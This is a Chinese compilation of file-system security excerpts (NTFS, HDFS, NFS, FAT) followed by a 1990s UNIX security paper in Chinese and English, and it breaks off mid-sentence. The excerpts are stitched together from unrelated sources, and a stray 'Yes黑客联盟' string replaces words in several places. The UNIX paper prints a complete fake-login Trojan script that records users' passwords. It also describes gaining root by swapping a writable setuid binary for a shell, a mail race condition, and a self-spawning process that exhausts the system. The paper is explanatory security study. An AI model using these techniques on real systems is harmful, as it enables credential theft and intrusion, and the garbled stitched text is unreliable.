文件系统安全

ntfs 原理NTFS（New Technology File System）是Windows操作系统中使用的一种文件系统。

它的设计目标是提供更高的性能、可靠性和安全性，以适应大型存储设备和复杂的操作环境。

NTFS的核心原理包括以下几个方面：1. 文件存储结构：NTFS使用了一种称为“Master File Table （MFT）”的数据结构来存储文件和文件夹的元数据信息。

每个文件和文件夹在MFT中都有一个相应的记录，包括文件名、大小、创建时间、修改时间等属性。

2. 文件分配：NTFS将存储介质（如硬盘）划分为簇（Cluster），每个簇的大小可根据用户需要进行设置。

文件在磁盘上的存储是以簇为单位进行分配的，相邻簇被组织在一起形成连续的簇链表。

这样可以提高读写的效率，并减少文件的碎片化。

3. 文件安全：NTFS引入了权限控制机制，可以对文件和文件夹进行细粒度的访问控制。

每个文件和文件夹都有一个安全描述符，包含了访问控制列表（ACL）和访问策略等信息，可以设置哪些用户或组对文件有何种操作权限。

4. 容错和恢复：NTFS具备容错和恢复机制，可以在磁盘发生故障或断电等异常情况下，通过文件系统的日志文件和元数据的冗余性来保证数据的完整性。

当系统重新启动时，NTFS可以通过检查日志文件进行自我修复，确保文件系统可用性。

5. 数据压缩和加密：NTFS支持对文件和文件夹进行数据压缩和加密。

压缩可以节省存储空间，而加密可以保护敏感数据不被非法访问。

综上所述，NTFS通过MFT存储文件的元数据信息，使用簇进行分配和存储文件数据，实现了权限控制、容错和恢复机制，同时支持数据压缩和加密。

这些原理使NTFS成为一种可靠、高效并且安全的文件系统。

一、Hadoop架构Hadoop实现了一个分布式文件系统（Hadoop Distributed File System），简称HDFS。

HDFS有高容错性的特点，并且设计用来部署在低廉的（low-cost）硬件上；而且它提供高吞吐量（high throughput）来访问应用程序的数据，适合那些有着超大数据集（large data set）的应用程序。

Hadoop的框架最核心的设计就是：HDFS 和MapReduce。

HDFS为海量的数据提供了存储，则MapReduce为海量的数据提供了计算。

Hadoop 由许多元素构成。

其最底部是Hadoop Distributed File System （HDFS），它存储Hadoop 集群中所有存储节点上的文件。

HDFS（对于本文）的上一层是MapReduce 引擎，该引擎由JobTrackers 和TaskTrackers 组成。

Hadoop 分布式计算平台最核心的分布式文件系统HDFS、MapReduce处理过程，以及数据仓库工具Hive和分布式数据库Hbase，基本涵盖了Hadoop分布式平台的所有技术核心。

HDFS对外部客户机而言，HDFS就像一个传统的分级文件系统。

可以创建、删除、移动或重命名文件，等等。

但是HDFS 的架构是基于一组特定的节点构建的（参见图1），这是由它自身的特点决定的。

这些节点包括NameNode（仅一个），它在HDFS 内部提供元数据服务；DataNode，它为HDFS 提供存储块。

由于仅存在一个NameNode，因此这是HDFS 的一个缺点（单点失败）。

存储在HDFS 中的文件被分成块，然后将这些块复制到多个计算机中（DataNode）。

这与传统的RAID 架构大不相同。

块的大小（通常为64MB）和复制的块数量在创建文件时由客户机决定。

NameNode 可以控制所有文件操作。

HDFS 内部的所有通信都基于标准的TCP/IP 协议。

NTFS文件系统中文件的安全擦除作者：闻德福,范波来源：《电脑知识与技术》2010年第20期摘要：对于国家安全部门的涉密文件的管理，往往与国防安全息息相关。

其中，涉密文件的销毁是涉密文件管理的重要环节，也是防止涉密文件泄露的工作重点。

文章从安全回收文件的角度，分析NTFS文件系统的存储组织结构，给出NTFS下文件的安全擦除方法。

关键词：文件系统；NTFS；文件擦除中图分类号：TP309.2文献标识码：A文章编号：1009-3044(2010)20-5463-02NTFS（New Technology File System）是微软开发的具有较好容错性和安全性的文件系统。

NTFS将磁盘卷中的所有数据都以文件的方式，而数据类型，大小等信息都作为文件的属性，记录在主文件表(Main File Table, MFT)记录中，每条MFT记录都分配同样大小的空间描述文件(夹)。

当文件放入回收站并被清空删除时，操作系统将文件MFT记录相应字段置为删除标志(在MFT中0x16偏移处)，同时文件MF记录号在$MFT的Bitmap属性中对应位置0标志该MFT记录号可供重新分配，将文件占用的数据簇在$Bitmap中的对应位置0标志空闲可供再分配。

虽然删除文件，在操作系统用户视图中无法获取，但通过数据恢复手段，该文件仍然可以再现。

本文对NTFS的主文件表记录及位图文件进行分析，研究了NTFS文件系统下文件的安全擦除。

1 NTFS 卷文件管理1.1 簇管理NTFS以簇为基本单位分配回收存储空间[1]，与FAT结构不同，NTFS卷(volume)从0扇区开始划分簇，每簇为1，2，4或8个扇区，根据分区的大小不同，最大值不超过8扇区，格式化时可以以格式化参数的形式设定。

而在FAT中，由于卷管理空间的限制，只能通过增加簇大小来管理大容量硬盘，较NTFS文件系统，容易造成存储空间的浪费。

NTFS簇大小，即每簇扇区数保存在BOOT扇区(0扇区)。

NFS网络文件系统与安全
陈玉洁;冯爽姿
【期刊名称】《吐哈油气》
【年(卷),期】2003(008)002
【摘要】随着信息技术的发展，创建软硬件资源的共享环境已成为信息技术发展的需要。

由SUN公司开发，并于1984年开始发展运用的NFS文件系统为UNIX 操作平台提供了一个资源共享的工具。

介绍了NFS的RPC机制原理与进程管理，并结合研究院的NFS文件系统说明了NFS文件系统的安全设置。

【总页数】3页(P170-172)
【作者】陈玉洁;冯爽姿
【作者单位】中国石油吐哈油田分公司勘探开发研究院，新疆哈密839009
【正文语种】中文
【中图分类】P618.13
【相关文献】
1.NFS网络文件系统技术在银行批量收付交易中的应用 [J], 祝志敏;修磊;彭新光
2.网络文件系统NFS [J], 毕建平;谢萍;刘艳萍
3.SNFS安全网络文件系统的设计与实现 [J], 王跃;罗军
4.并行网络文件系统PNFS性能评测与分析 [J], 张媛;于冠龙;卢泽新;刘亚萍
5.并行网络文件系统PNFS研究 [J], 张媛;于冠龙;阚云鹤
因版权原因，仅展示原文概要，查看原文内容请购买。

了解电脑文件系统NTFSvsFAT 在现代科技领域中，电脑文件系统是一项重要而必不可少的组成部分。

它是用于协调和管理计算机硬盘、固态硬盘（SSD）或其他存储设备上的文件和文件夹的软件程序。

文件系统的选择对于计算机性能和数据存储的安全性都具有重要影响。

在这篇文章中，我们将重点讨论两种常见的文件系统：NTFS（New Technology File System）和FAT （File Allocation Table）。

我们将详细了解它们各自的特点、优劣势以及在实际应用中的适用范围。

一、NTFSNTFS是微软公司开发的一种高级文件系统，最早于1993年加入Windows NT 3.1操作系统中，并成为后续Windows系统的默认文件系统。

与FAT相比，NTFS具有许多先进的功能和改进的性能。

1. 安全性：NTFS支持访问控制列表（ACL）和文件加密等安全功能。

通过ACL，用户可以对文件和文件夹进行细粒度的权限控制，以实现更高的数据保护。

文件加密则可有效保护敏感数据免受未经授权的访问。

2. 可靠性：NTFS采用了日志式文件系统的设计，可以更好地防止数据损坏和文件系统崩溃。

日志记录了文件操作的每个步骤，使得在系统崩溃或断电后可以更快速地进行恢复和修复。

3. 空间利用率：NTFS使用了一种称为“簇”的存储单位，它能够更好地利用硬盘空间，减少碎片化带来的性能损失。

4. 文件大小：NTFS支持更大的文件和分区大小。

单个文件可以达到几TB的大小，而总分区大小则可以超过16EB（Exabyte）。

总结起来，NTFS作为一种先进的文件系统，提供了更高的安全性、更好的可靠性、更高的空间利用率和更大的文件大小支持，适用于对数据安全性要求较高的场景，如企业级的服务器和桌面操作系统。

二、FATFAT是早期微软操作系统中广泛使用的一种文件系统。

它最早于1977年引入操作系统，并一直被用于早期版本的Windows操作系统，如Windows 95和Windows 98。

UNIX系统安全本文首先讨论了UNIX系统的一些安全保护机制: 1.注册标识和口令是UNIX系统安全性方法的核心; 2.文件安全是操作系统安全最重要的部分, UNIX系统的每一文件都有一系列控制信息决定了不同的用户对该文件的访问权限; 3.约束SHELL规定标准SHELL的一些命令无效, 如改变路径和重定向命令无效; 4.文件加密是保护用户重要文件不被他人盗取的一种必要手段.然后探讨了一些不安全的因素: 1.口令, 非法用户可通过未使用口令或口令泄密了的用户注册标识进入系统, 或者编写口令猜测程序获取其他用户甚至超级用户口令, 从而读取或破坏用户文件; 2.文件, 设置了不正确权限的文件是不安全的一个重要因素; 3.特洛伊木马, 是获取系统特权和用户口令的一种有效方法, 也许是最隐蔽的不安全因素; 4.设备特殊文件, 包括块设备和字符设备; 5.网络, 由于历史的原因, 它可能是UNIX系统中最不安全的部分; 6.其它, 如邮件, 后台命令, 任务调度和游戏等.最后提出了系统管理员和用户必须采取的一些安全措施.UNIX系统安全UNIX系统是为支持多用户而设计的, 故为多用户提供了访问机器的多种途径, 同时也为用户之间和多机之间通信提供了多种工具, 然而在当今世界上出于各种目的, 未授权人员常常打入计算机系统. 当我们越来越依赖于UNIX机器以及机器中的文件和数据时, 系统安全性也随之变得越来越重要, 虽然可以采取措施阻止非法访问, 但是一种复杂操作系统的自然趋势是时间越久安全性越差, 我们必须警惕安全性缺陷, 及时堵塞漏洞, 保护系统. 下面首先讨论UNIX的安全保护机制, 然后探讨一些不安全的因素, 最后提出相应的安全措施.I. UNIX的安全保护机制UNIX系统最初是为完全共享机器的小单位设计的, 没有严格限制任何用户对其他用户的文件命令的访问, 甚至对访问UNIX系统正常工作所需要的最敏感数据也不加限制. 随着时间的推移, 人们对安全性的看法发生了根本性的变化.现代UNIX系统和多数操作系统一样可靠. 如注册标识和口令, 文件权限及约束SHELL等保护机制的综合运用, 有效地保护了整个系统的安全.1. 注册标识和口令UNIX系统中, 安全性方法的核心是每个用户的注册标识(loginid)和口令(password). 要成功注册进入UNIX系统, 必须打入有效的用户标识, 一般还必须输入正确的口令. 口令是以加密形式存放在/etc/passwd文件中, 每个用户占一行, 另外几个系统正常工作所必需的标准系统标识也占一行. 每行由几个以冒号(:)分隔的域组成: 域1是用户标识, 域2是口令, 域3是用户标识数, 域4是用户组标识, 域5是注释, 域6是用户主目录, 最后一个域是用户注册shell的路径全名(缺省为/bin/sh).%cat/etc/passwsroot:Y0q0Fr68KMP8U:0:1:'[]':/:/bin/cshdaemon:*:1:1::/:sys:*:2:2::/:/bin/cshbin:*:4:8::/var/spool/uucppublic:news:*:6:6::/var/spool/news:/bin/cshsync::1:1::/:/bin/syncwwm:66XGDZDOR4Fjq:349:349:Wei wei ming:/pc/wwm:/bin/csh+::0:0:::早期UNIX版本中, 域2以加密形式放置用户的实际口令. 而SVR3的近期版本却引入了一个仅含加密后口令的文件即/etc/shadow. 它存放每个用户的标识及加密后的口令, 描述最后一次修改口令的时间, 允许修改口令的最早期限和必须修改口令的最晚期限. /etc/shadow中的行与/etc/passwd中的行对应./etc/shadow文件由命令pwconv生成. 手工修改/etc/passwd文件后, 必须立即运行pwconv, 保证/etc/shadow按照刚进行过的修改更新. 只有超级用户可对/etc/passwd和/etc/shadow进行修改.另外, 有些UNIX版本还显示最近一次使用用户标识的情况. 注册时显示:login : wwmpassword:Login last used : Fri Aug 7 22:24:41 CDT 1993如果显示时间晚于用户记忆中自己最近使用的时间, 则该标识就被别人占用过了, 该用户应立即修改口令.命令passwd改变口令, 一个口令至少要有6个字符长, 其中至少一个(最好两个)是非字母符号, 最好大小写混用和采用超常或非直觉字符序列, 不能容忍的平凡口令是用户的注册标识, 工程项目名, 地名或电话号码等.2. 文件权限文件安全是操作系统安全最重要的部分, UNIX系统每一文件都有一系列控制信息决定了不同的用户对该文件的访问权限. 下面是文件的权限位格式:U G T R W X/S R W X/S R W X/S| | | 用户同组其他调调粘整整着R: 读W: 写X/S : 执行/搜索主组位它们由四个八进制数组成: 第一个八进制数是调整uid位, 调整gid位和粘着位, 后面三个八进制数分别表示文件所有者, 同组用户和其他用户对该文件的访问权限. 下面是命令ls -l的输出形式:drwxr-sr-x 3 root 512 Oct 14 1990 nserve-rw-r--r-- 1 root 1145 Oct 14 1990 aliaseslrwxrwxrwx 1 root 10 Apr 27 14:18 adm->../var/admsrw-rw-rw- 1 root 0 Apr 12 06:42 logbrw-rw-rw- 1 root 16, 0 Apr 27 14:47 fd0acrw-rw-rw- 1 root 13, 0 Apr 27 14:47 mouse命令ls-l输出的左边给出了文件的访问权限或Yes黑客联盟访问方式, 其中最左边位含义为:- 说明为普通文件l 说明为链接文件d 说明为目录p 先进先出特别文件b 说明为块特别设备文件c 说明为字符特别设备文件系统提供了专门处理文件和目录的所属关系和访问权限问题几个命令:chown: 可以将文件所属转让chgrp: 改变文件所属小组chmod: 改变文件访问权限3. 约束shell标准shell提供用户许多功能, 如用户可在文件系统中漫游等, 然而几乎所有UNIX系统都提供另一个Yes黑客联盟为rsh的shell, rsh是标准shell的一个子集:. rsh规定目录改变命令无效. 包含字符"/", ">"和">>"的命令无效. 不能改变文件路径变量$PATH的值等但当rsh的用户在运行一个shell程序时, rsh将调用标准shell全权执行程序中的所有命令, 这时上述rsh的限制将不起作用. 因此, 更灵活的限制手段是由系统管理员编制一个专用的shell程序, 取代标准shell程序, 用户注册后即进入该shell, 程序执行终了时立即自动退出系统, 从而达到对一些用户进行严格管理和限制的目的.4. 文件加密正确的文件权限能限制非法用户对文件的访问, 但不能排除一些高明的入侵者和超级用户读取文件.ed, vi和emacs这类编辑程序选项-x提供一种生成并加密文件的能力, 在装入时对文件解密, 回写时再加密.UNIX系统还提供加密解密过滤程序crypt, 该命令从标准输入读, 向标准输出写. 有的系统还提供DES命令, 遗憾的是人们对UNIX的加密算法了解太深, 有一种打破crypt的程序是分析普通英语文本中和加密文件中字符的出现频率,因此, 过分相信文件加密是危险的, 但我们可以在加密前用另一个过滤程序改变字符出现的频率, 如用pack:%pack example.txt%cat example.txt.z | crypt >out.file解密时要扩张(unpack)这一文件, 另外压缩后通常可节约占原文件20%到40%的空间.%cat out.file | crypt >example.txt.z%unpack example.txt.z当然, 将文件写软盘或磁带上, 删除机器中的原文件, 妥善保管磁介质是最保险的方法.II. 不安全的因素前面我们讨论了UNIX的安全保护机制, 这些机制是有效的, 但并非是十分安全的, 关键是系统管理员和用户没有合理地运用这些机制.1. 口令由于UNIX允许用户不设置口令, 因而非法用户可通过/etc/passwd文件查出未使用口令的用户(或者即使设置了口令, 却泄露了出去), 盗用其名进入系统, 读取或破坏该用户的文件.另外就是口令猜测程序了, 入侵者不断地输入可能的口令(或者由程序产生), 进行加密并和/etc/passwd文件中的口令密文比较, 直到成功地获得某一用户的口令为止. 虽然这比较费时, 但由于用户在选择口令时的局限性, 成功的例子还是很多的.2. 文件我们正确设置文件权限, 某些设置可以增加文件的不安全因素, 让我们看几个设置了不正确权限的文件的例子:-rwxrwxrwx 1 root 1496 Oct 14 1990 /bin/ttydrwxrwxrwx 7 bin 2048 Aug 7 07:57 etc-rwsrwxrwx 1 root 8832 Oct 14 1990 /bin/df命令/bin/tty任何用户都有写许可, 意谓着谁都可以直接修改此命令或用另一文件替换此命令, 这往往会造成严重的后果.目录/etc对所有用户有写许可, 则任意用户可修改或替换该目录下的passwd 文件, 可以使超级用户没有口令, 从而以特权身份侵入系统./bin/df是调整uid的, 对该命令有写许可, 则用户可以用/bin/sh替换此df命令, 然后执行(实际是/bin/sh)即获得超级用户特权.从以上例子可看出, 文件的写权限往往是不安全的因素, 对于目录和使用调整位的文件来说更是危险.3. 特洛伊木马也许最隐蔽的不安全因素是特洛伊木马, 它是获得系统特权和用户口令的一种有效方法. 让我们看下面例子:#! /bin/sh# trap V1.o 1992.3.28# Function: Get the other user's password# Usage: trap pidif [ $# -ne 2 ]; thenecho "ERROR: invalid numbers of arguments"echo "Usage: trap pid"exit 1ficlear# change interrupt character. The default is DEL.stty instr +while [ 1]doecho -n ":V& login: "read usernameif[ "$username" != "" ]; thenbreakfidonestty -echoecho -n "Password: "read passwdecho ""echo $username $passwd >> /f/wwm/tmp/loginsleep 1echo "Login incorrect"stty echo# reset default interrupt character DEL (^?).stty intr# logout yourself username.kill -9 $1# OK.上面的shell程序伪装成录入程序, 非法用户在某终端上运行该程序后走开, 等待受骗者的到来, 就可轻易窃走该用户的口令.另外一些常见的情形是侵入者在某用户的一个目录下植入洛伊木马程序,一旦该用户在此目录下执行此程序, 侵入者便可以获取该用户权限, 进而破坏用户文件, 如伪装的pwd命令, ls命令和su命令等.4. 设备特殊文件UNIX系统的两类设备(块设备和字符设备)被当作文件看待, Yes黑客联盟为特别文件, 都在/dev目录下, 对于特别文件的访问, 事实上就访问了物理设备. 这些特别文件是系统安全的一个重要方面.1) 内存对物理内存和系统虚空间, System V 提供了相应的文件/dev/mem和/dev/kmem,mem是内存映象的一个特别文件, 它可以用于检验(甚至修补)系统. 若该文件用户可改写, 则可在其中植入洛伊木马或通过读取和改写主存内容而窃取系统特权.2) 块设备由于文件系统的操作自然牵涉到块设备的读写, UNIX System V对块设备的管理分为三层, 最高层是与文件系统的接口, 包括块设备的各种读写操作.例如磁盘, 如果一旦对盘有访问权限, 就可以修改其上的文件, UNIX允许安装不同的盘作为文件系统, 非法用户可以通过安装自己的软盘作为文件系统, 而其软盘上有修改后的系统文件, 如一些属于root的setuid程序, 这样他就可以安装自己的文件系统, 执行非法的setuid程序, 获取更高的特权.3) 字符设备例如终端设备, 在UNIX中, 每个用户都通过终端进入系统, 用户对其录入的终端有读写权限. 由于UNIX对文件权限的检查往往只在打开操作(open系统调用)时进行, 其后的操作往往不再检查, 因此某些用户进入系统后可以编写一监测程序, 读取其后用户录入该终端的输入信息.5. 网络UNIX的网络程序主要是uucp(UNIX to UNIX copy), uucp可以在UNIX系统之间传输文件和远程执行命令. 由于历史的原因, 它可能是UNIX系统中最不安全的部分.一种情况是用户可以使用uucp复制远程系统的/etc/passwd文件, 查出未使用口令的用户, 从而通过该用户进入远程系统; 另一种情形是在uucp机制中未加密的远程uucp号的口令存在一个普通系统文件/usr/lib/uucp/L.sys中,非法用户在窃取root权限后通过读取该文件而获得每一远程uucp帐号的口令,进而破坏远程系统.6. 其它1) 邮件在BSD, SUNOS等版本中, 实用程序/bin/mail首先调用mktemp()得到临时文件, 然后判断是发信还是读信. mail进程在得到文件名后打开文件写以前, mail进程可能会因为时间片用完而被迫放弃CPU, 这时其它进程占据CPU后, 可将某些重要的系统文件与临时文件链接, 等到mail再次运行时, 它要写入的临时文件实际上已变成系统文件(如/etc/passwd), 这样就可轻易篡改系统文件.2) 后台命令shell提供操作符&使用户在后台运行命令, UNIX系统允许用户建任意多个后台进程, 直到系统核心内部说明的最大值, 但远未达到这一极限之时, 系统性能即开始受损. 遗憾的是, 很多UNIX版本的ps命令不能很好地反映后台进程的状态. 下面是一个非常简单的shell程序:% cat call-selfcall-self% call-self &投入后台方式运行后, 将产生永无休止的进程, 即使是root也无法用kill命令终止它, 只有直至系统崩溃. 如果按如下方式运行, 情况又将如何?% cat call-selfcall-self &% call-self &3) 任务调度为使多进程都能够公平访问机器的单CPU, 操作系统内的分时机构必须在某一进程耗尽应分享的CPU资源后切换至另一进程, UNIX提供了计时和调度工具, 如at和batch命令. 如果对授权用户清单文件/usr/lib/cron下的at.allow和at.deny文件权限设置不对, 未授权用户可能就会对系统造成极大的破坏.另外, 还有如游戏, 很多游戏程序产生一些中间文件, 有些病毒程序和入侵者就可能会从这些文件侵入. 因此, 我们也必须对游戏提高警惕.III. 安全措施保护系统安全需要多方面的努力, 首先系统设计人员不断增强操作系统的安全性, 增加安全性检查, 提供更安全的系统版本和更多的安全检测工具; 其次, 系统管理员和用户都必须明确自己的职责, 共同保证系统安全.1. 系统管理员系统管理员担负着维护整个系统安全的重要使命, 必须谨慎地管理系统:1) 正确设置系统文件和系统目录的访问权限2) 选择root口令, 并定期更换. 认真确定root用户组权限, 制止不合法用户申请帐号3) 经常检查sulog文件, 查找可能的入侵者踪迹4) 检查/usr/lib/crontab文件内容, 防止有人蓄意破坏文件系统或埋植特洛伊木马5) 仔细认可用户安装自己的文件系统6) 对于网络环境:. 防止信息内容泄露. 防止通信量分析. 检查信息源的修改. 检查设备错误. 检查连接请求的冒充2. 用户用户要保证自己的信息, 必须充分正确地运用安全保护机制:1) 选择好口令, 并保存好, 定期更换2) 仔细设置.profile, umask和PA TH3) 对重要正文使用加密, 并做好备份4) 在通过终端录入系统时, 最好先清一下终端, 防止有诈5) 离开终端时, 一定要退出系统参考文献:[1] Stephen Coffin, UNIX使用大全, 电子工业出版社, 1991[2] 艾瑞云, 计算机操作系统安全问题, 计算机世界报, 1992.3.4[3] 朱鲁华, UNIX安全浅谈, 计算机世界报, 1990.12.5[4] 周尚德, UNIX的一个漏洞及分析, 电脑应用时代, 1992.1[5] 郭伟坚, 几种UNIX文件的安全保密方法, 计算机世界报, 1990.12.5[6] SUN microsystems, SunOS Reference Manual, 1991[7] 胡希明等, UNIX结构分析, 浙江大学出版社, 1991.2UNIX SECURITYWei Weiming[ABSTRACT]In this paper, we first introduced the basic mechanism of the securityin the UNIX system: 1) The cores of methods for system security arelogin-id and password for every user; 2) File-security is the mostimportant part of OS-security; 3) It is a considerable method that restricting to abuse shell;4)File-encryption is a necessary method for protecting important files.Them we discussed some insecurity factors of UNIX: 1) Unreliable restriction by password; 2) Files which permission be set up unsuitably; 3) Trojan horse which be used to steal system privilegedand user's password; 4) Device special files; 5) Network.UUCP of UNIX may be the most insecurity part of system; 6) Others.Finally, we suggest several steps to enhance system security forsystem administrator and general users.UNIX SECURITYUNIX is designed as a multi-user system which provides various waysfor users to visit the computer system and also provides various toolsfor users and computers to communicate with each other. Although all these facilities offer great convenience for users, they leaves the possibility for some unauthorized or illegal entries to the computer system which might cause great damage to the information in the computer and the computer system itself. So the security of the computer system become very important especially as we are more and more relying on the files and data in the computer. We do can take some measures to prevent the illegal entry to the computer,however,the longer the computer system is used, the less security it will be. We should keep an eye on thesecurity of the system and find any possible shortage of it so that we could keep the system perfect security.In this paper,we first introduce the basic mechanism of the securityin the UNIX system, then we will discuss some factors which could lead to the insecurity of the system and suggest some correspondent methodsto prevent them.I. THE MECHANISM OF UNIX SECURITYUNIX was primarily designed for users to share the system completely, there were not any limitation for user to access to other users file,any user could even visit the most sensible data which made the system's normal running possible. Now people's views about security has changed greatly, and modern UNIX system has become as safe and reliable as most of other operation systems, for example, it offers loginid and password, the permission to access the file and restricted SHELL, etc., which protect the system effectively.1. Loginid and passwordIn UNIX system, the keen step to keep safe is to demand the loginid and password of every user. To login successfully, one has to enter acceptable loginid and proper password in general. The encrypted passwords possessed one line in the file /etc./passwd, each line is devide into several fields by (;), field 1 is the userid, field 2 isthe passwd, field 3 is the number of userid, field 4 is the group id,field 5 is the interpretation, field 6 is the main directory of userand the last field is the full pathname used to login to SHELL byuser(default:/bin/sh).%cat/etc/passwdroot:Y0q0Fr68KMP8U:0:1:'[]':/:/bin/cshdaemon:*:1:1::/:sys:*:2:2::/:/bin/cshbin:*:4:8::/var/spool/uucppublic:news:*:6:6::/var/spool/news:/bin/cshsync::1:1::/:/bin/syncwwm:66XGDZDOR4Fjq:349:349:Wei wei ming:/pc/wwm:/bin/csh +::0:0:::Figure 1. file /etc/passwdIn early UNIX versions, field 2 is user's current encrypted password, recent version SVR3 create a file /etc/shadow which contains the encrypted passwords. It stores every userid and the encrypted password and prompt the time of last modification of password and the earliest deadline permitted to modify the password and latest deadline when the password must be modified. The line in /etc/shadow is correspondent to the line in /etc/passwd/etc/shadow is produced by command 'pwconv'. After modifying file /etc/passwd, running of command 'pwconv' is essential so that /etc/shadow can be renewed according to the just modified /etc/passwd. Only super user is allowed to modify /etc/passwd and /etc/shadow.Some other UNIX versions could show information about using the userid. When logging, is shows:login:wwmpassword:Login last used: Fri. Aug. & 22:24:41 CDT 1992Figure 2. login historyIf the time showed is later than the latest time user used thelogin, this userid must has been used by other user illegally. Theuser must change the password immediately.Password can be changed by command 'passwd'. A password should be at least six characters long and it will be better is the passwordincludes one or two nom-character sign and combines upper-case and lower-case letters and adopt abnormal character sequence. some bad choices of passwords are userid, project name, address and telephone numbers.2. File permissionThe security of the files is the most important part of the operating system. For each file in UNIX system, there is a series of information which decide the visiting permission of different user.U G T R W X/S R W X/S R W X/SU: user group otherG: R: readable W: writeable X/S: executable/searchableT: -: the permission is not grantedFigure 3. Character format of the file permissionThey consist of four octadic digits. The first is adjusting the Uidbit, adjusting Gid bit and sticking bit, the others are the permissionof the file's owner in same or different group.drwxr-sr-x 3 root 512 Oct 14 1990 nserve-rw-r--r-- 1 root 1145 Oct 14 1990 aliaseslrwxrwxrwx 1 root 10 Apr 27 14:18 adm->../var/admsrw-rw-rw- 1 root 0 Apr 12 06:42 logbrw-rw-rw- 1 root 16, 0 Apr 27 14:47 fd0acrw-rw-rw- 1 root 13, 0 Apr 27 14:47 mouseFigure 4. List file and directory with ls -lThe left of the output of command ls -l (long listing) is the- entry is a plain filel entry is a symbolic linkd entry is a directoryp entry is a FIFO (also known as "named pipe") fileb entry is a block special filec entry is a character special files entry is an AF_UNIX address family socketThe system provides several commands which process the relation between files and directory and visiting permission.chown: change ownerchgrp: change groupchmod: change mode3. Restricted shellThe standard shell has many functions such as the user roaming inthe file system. However, almost all of UNIX system have another shell called rsh(restricted shell) from the standard shell:. change directory is invalid in rsh. command include '/', '>' and '>>' is invalid.. the value of $PATH can not be changedWhen a shell program is running, the rsh will call the standard shellto excute all commands while the restriction of rsh is unacted. Thus,a better restriction is that the standard shell is replaced with special program compiled by system manager for the strict management and restriction to some users by the way of which the user enters the shell immediately after login and quits automatically immediately after the execution over.4. Encrypt the fileThe correct permission prevent an illegal user from visiting, but cannot prevent a clever user or a super user from reading or writing.The item -x from the edit program such as ed, vi and emacs providesa function being able to proc\duce and editing the encrypted file. When loaded, the file decrypted, when rewrite the file encrypted again.UNIX system also provides program crypt, the program of encryption and decryption from standard input to standard output. Some systemscan provide DES command (Encrypt or decrypt data using data encryption standard). The regret is that encryption in UNIX system is widely known. For example: An encryption program can analysis the frequency of the letters appear in the English novel and that of the letters appear inthe encryption file. So, it is danger to believe the encrypted file entirely. However, we can change the frequency of the letters with another filter program.e.g. pack%pack example.txt%cat example.txt.z | crypt >out.fileUnpack the file when decrypted. After packed, the space can besave 20%-40%.%cat out.file | crypt >example.txt.z%unpack example.txt.zOf course, the best way is that canceling the file after beingwritten on disk or tape and then keeping the magnetic media carefully.II. INSECURITY FACTORSAbove we talk about the mechanism of UNIX security. The mechanism is valid, but not safe completely because the system manager and user utilize the mechanism unreasonable.1. PasswordBecause UNIX permits the user not to install password, the illegal users can enter the system to read and write or destroy the file by usurping the user's name without password (or even set a password, but reveal) which can be found from the file /etc/passwd.Another way is to guess the password. The invaders input the possible password(or produce by excuting a program) continuously, encrypt and compare with the password file in /etc/passwd until successfully toget a password. Although this may waste time, there are many successes because of the limit passwords.2. FileWe must setup the file permission correctly. Some setup can add unsafe factors. Bellows are some examples of incorrect permission:-rwxrwxrwx 1 root 1496 Oct 14 1990 /bin/ttydrwxrwxrwx 7 bin 2048 Aug 7 07:57 etc-rwsrwxrwx 1 root 8832 Oct 14 1990 /bin/dfFigure 5. The incorrect permission of the file being setupAny user is permitted to write the command /bin/tty, which means that anyone can modify this command directly or replace the command with another file. So, the consequences would be disastrous.All users are permitted to write the directory of /etc, and any usercan modify or replace the password file under the directory to let the super user loose password, thus invading system as privileged dignity. The privileged dignity of the super user can be obtained by excuting/bin/df (in fact /bin/sh) replaced with /bin/sh which adjusts uid andis permitted to be written.From the above, we can see that the permission of the files is afactor of unsafe. It is danger for directory and the files using adjusting bit.3. Trojan horseMaybe the most covered factor of insecurity is Trojan horse, which is an effective method to obtain the system privilege and user's password. Following is an example:#! /bin/sh# trap V1.o 1992.3.28# Function: Get the other user's password# Usage: trap pidif [ $# -ne 2 ]; thenecho "ERROR: invalid numbers of arguments"echo "Usage: trap pid"exit 1ficlear# change interrupt character. The default is DEL.stty instr +while [ 1]doecho -n ":V& login: "read usernameif[ "$username" != "" ]; thenbreakfidonestty -echoecho -n "Password: "read passwdecho ""echo $username $passwd >> /f/wwm/tmp/loginsleep 1echo "Login incorrect"stty echo# reset default interrupt character DEL (^?).stty intr# logout yourself username.kill -9 $1# OK.Figure 6. Trojan horse programAbove shell program is camouflaged to login, i.e. the illegal usersexcute the program on terminal and leave, waiting for the deceived soas to steal the user's password easily. In other cases, the invadersplant Trojan horse program under someone's userid. Once the userid be used to run the program, the invader will obtain the permission and then proceed cause the file damaged. For example the programs are command pwd, command su, etc ...4. Device special filesIn UNIX system, there are two kinds of device(that is, block deviceand character device) being treated as file and called as special file.Both of them are under /dev directory. Any visit to a special fileactually means a visit to a physical device. These special files is an important aspect of system security.1) MemoryFor physical memory and kernel memory, system V provides following files: /dev/mem and /dev/kmem. mem is a special file of memory reflection, which can be used for system check up or even system repairment. If the file is writable, its privilege can be stolen byplanting Trojan horse or by reading and rewriting memory content.2) Block deviceBecause the operating of system files involves reading and writing of block device, the management of block device in UNIX system V has three levels. Among them the highest one is the interface with the file system, which includes various kinds of reading and writhing of block device. Take a disk for example. If someone has the permission to visitthe disk, he can change files on it. In UNIX system, different disksare allowed to be loaded as file systems. An illegal user can load hisown soft disk as file system and on the disk there are changed systemfiles such as some setuid programs under root. By doing this he can loadhis own file system, run illegal setuid program and get higher privileges.3) Character deviceSuch as terminal device. In UNIX system, each user can enter the system through a terminal and the user has the permission to read or write onthe terminal he logged. Because the check of file privilege in UNIX system can be done only when the file is being opened. No more checks on reading and writing operation afterwards. So some users entered the system can design a monitoring program and obtain the information input into the terminal by the cheated.5. NetworkOne of the main network programs of UNIX is uucp (UNIX to UNIX copy) which can deliver files and execute commands between UNIX systems. Because of some historic reasons, uucp is likely the unsafest part.Here is one circumstances. A user can copy a /etc/passwd file of aremote system by using uucp, find some user who has not given passwords and enter the remote system by the way of this user.Another circumstances. In uucp mechanism, unencrypted password of a remote uucp account exists in a common system file /usr/lib/uucp/L.sys. After stealing root privileges, an illegal user can destroy the remote system by reading the file and obtaining passwords of every remote uucp account.6. The others1) MailIn BSD, SunOS etc. versions, utility program /bin/mail firstly runs mktemp() to get a temporary file, then makes a judgment whether tosend or to receive a mail. After getting a file name, a mail process maybe forced to give up CPU before writing the file. At the same time, other processes may occupy CPU and be able to link some important system files to the temporary file. When the mail runs for the second time, the temporary file that the mail is to write has been change into a systemfile(such as /etc/passwd). By doing this, system files can be changed easily.2) Background commandShell provides 